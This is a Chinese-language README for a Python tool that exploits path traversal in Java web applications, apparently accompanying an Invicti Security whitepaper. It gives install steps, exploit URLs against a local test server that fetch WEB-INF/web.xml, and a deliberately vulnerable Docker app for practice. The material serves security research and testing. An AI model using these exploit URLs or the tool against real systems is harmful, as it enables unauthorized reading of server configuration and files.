用于帮助利用 Java Web 应用程序中路径遍历漏洞的工具。
该工具在 Invicti Security 白皮书 Exploiting path traversal vulnerabilities in Java web applications 中被引用。
此工具需要 Python3。
运行以下命令:
pip install -r requirements.txt
安装后,按如下方式提供漏洞利用 URL:
usage: python WebXMLExp.py <url_with_web_xml_exploit_or_inject_here_marker>
结果(已下载的文件)位于 results 文件夹中。
python WebXMLExp.py "http://127.0.0.1:8082/vulnerable/download.servlet?filename=WEB-INF/web.xml"
python WebXMLExp.py "http://127.0.0.1:8082/vulnerable/download.servlet?filename=<INJECT-HERE>"
docker 文件夹中提供了一个存在路径遍历漏洞的 Web 应用。
如需启动,请进入 docker 文件夹并运行:
docker-compose up
该应用可通过 http://127.0.0.1:8082/vulnerable/ 访问。
要利用路径遍历漏洞,请访问: http://127.0.0.1:8082/vulnerable/download.servlet?filename=WEB-INF/web.xml